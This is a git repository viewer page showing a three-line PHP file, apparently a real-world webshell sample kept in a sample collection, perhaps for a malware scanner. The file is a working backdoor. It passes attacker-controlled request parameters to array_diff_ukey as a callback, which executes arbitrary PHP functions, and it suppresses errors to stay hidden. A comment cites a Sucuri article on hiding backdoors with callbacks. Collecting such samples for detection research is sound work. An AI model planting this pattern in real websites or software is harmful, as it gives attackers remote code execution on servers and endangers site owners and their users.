summaryrefslogtreecommitdiff
path: root/data/samples/real/sucuri_2014_04.php
blob: 64bfa0795b5cbb20f16c866dfd3fd55e9613af38 (plain)
1
2
3
<?php
/* https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html */
@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);